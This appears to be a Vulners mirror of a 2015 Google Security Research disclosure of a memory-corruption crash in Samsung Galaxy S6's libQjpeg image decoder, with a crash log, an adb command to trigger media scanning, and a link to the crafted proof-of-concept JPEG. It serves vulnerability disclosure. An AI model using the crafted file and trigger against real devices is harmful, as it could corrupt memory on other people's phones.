Vulners
Lucene search
Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash
🗓️ 03 Nov 2015 00:00:00Reported by Google Security ResearchType 
exploitdb🔗 www.exploit-db.com👁 26 Views
Source: https://code.google.com/p/google-security-research/issues/detail?id=498
The attached jpg, upsample.jpg can cause memory corruption when media scanning occurs
F/libc ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2956): Revision: '10'
I/DEBUG ( 2956): ABI: 'arm64'
I/DEBUG ( 2956): pid: 8600, tid: 8685, name: HEAVY#0 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG ( 2956): x0 0000007f8cef2ab0 x1 0000000000000002 x2 0000007f8cef2ab0 x3 0000007f8ce5a390
I/DEBUG ( 2956): x4 0000007f8cef28d0 x5 3d206e6f69747562 x6 0000007f8cef29f0 x7 42e34ca342e32177
I/DEBUG ( 2956): x8 42e390a242e37199 x9 42dfe02f42debc0f x10 42e06c3442e03665 x11 42e0afd542e08c24
I/DEBUG ( 2956): x12 42e1070042e0e62d x13 42e1830842e146da x14 42e1f53342e1add4 x15 00000000000014a4
I/DEBUG ( 2956): x16 0000007f9f0d6ae0 x17 0000007fa3e7e880 x18 0000007f8ce75c60 x19 0000007f8cebe000
I/DEBUG ( 2956): x20 0000000000000001 x21 0000007f8cebe000 x22 0000000000000001 x23 0000000000000000
I/DEBUG ( 2956): x24 0000000000000000 x25 0000000000000000 x26 0000000010000000 x27 0000007f8c5ff050
I/DEBUG ( 2956): x28 0000007f8ce77800 x29 000000000000001c x30 0000007f9f09fff8
I/DEBUG ( 2956): sp 0000007f8d0fea20 pc 0000007f9f09e83c pstate 0000000080000000
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 000000000009b83c /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG ( 2956): #01 pc 000000000009cff4 /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG ( 2956): #02 pc 0000000000035700 /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG ( 2956): #03 pc 0000000000041f08 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG ( 2956): #04 pc 00000000000428d4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 2956): #05 pc 0000000000042a08 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG ( 2956): #06 pc 000000000004420c /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG ( 2956): #07 pc 00000000000a4234 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 2956): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 2956): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG ( 2956): #10 pc 00000000000018ec /system/framework/arm64/saiv.odex
To reproduce, download the image file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zipData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Nov 2015 00:00Current
7.4High risk
Vulners AI Score7.4